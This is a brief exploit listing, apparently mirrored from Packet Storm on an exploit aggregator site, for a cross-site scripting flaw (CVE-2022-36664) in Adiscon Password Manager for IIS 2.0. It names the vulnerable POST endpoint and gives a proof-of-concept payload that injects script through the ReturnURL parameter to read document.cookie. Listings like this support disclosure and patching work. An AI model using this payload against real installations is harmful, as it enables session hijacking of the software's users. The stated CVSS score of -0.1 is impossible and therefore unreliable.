Exploit for Password Manager For IIS 2.0 Cross Site Scripting CVE-2022-36664

Name: Exploit for Password Manager For IIS 2.0 Cross Site Scripting CVE-2022-36664
Rating: 5 (161 reviews)

2022-10-03 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:168599
# Exploit Title: *XSS*  
# Exploit Author: *VP4TR10T*  
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/  
<http://passwordmanager.adiscon.com/en/manual/>  
*# Software Link:*http://passwordmanager.adiscon.com/  
<http://passwordmanager.adiscon.com/>  
*# Version: *Version 2.0  
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664  
  
*Affected URI (when trying to change user password):  
POST /isapi/PasswordManager.dll HTTP/1.1  
  
HTTP Payload (Affected Parameter ):  
ReturnURL=<script>alert(document.cookie)</script>  
  
*Cordially,*